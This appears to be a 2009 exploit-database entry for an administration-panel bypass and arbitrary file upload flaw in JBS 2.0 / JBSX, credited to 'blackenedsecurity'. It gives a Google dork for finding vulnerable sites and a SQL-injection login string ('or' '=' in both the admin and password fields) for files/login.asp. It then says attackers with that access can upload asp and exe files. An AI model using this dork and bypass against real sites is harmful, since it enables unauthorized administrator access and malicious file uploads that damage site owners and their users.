JBS 2.0 / JBSX - Administration Panel Bypass / Arbitrary File Upload
| EKU-ID: 17768 | CVE: | OSVDB-ID: |
| Author: blackenedsecurity | Published: 2009-11-17 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 17768 | CVE: | OSVDB-ID: |
| Author: blackenedsecurity | Published: 2009-11-17 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Administration panel bypass and Malicious File Upload Vulnerability # JBS v2.0 JBSX and other Jiro's Products # Google Dork: "inurl:/files/redirect.asp" Go to url files/login.asp admin 'or' '=' password 'or' '=' H4ckers may upload malicious files by using upload panel as they have administrator acces they are able to change settings and upload asp and exe files. # Bug discovered by blackenedsecurity # http://blackenedsecurity.blogcu.com # msn: syberhunter@hotmail.com # From Turkey =)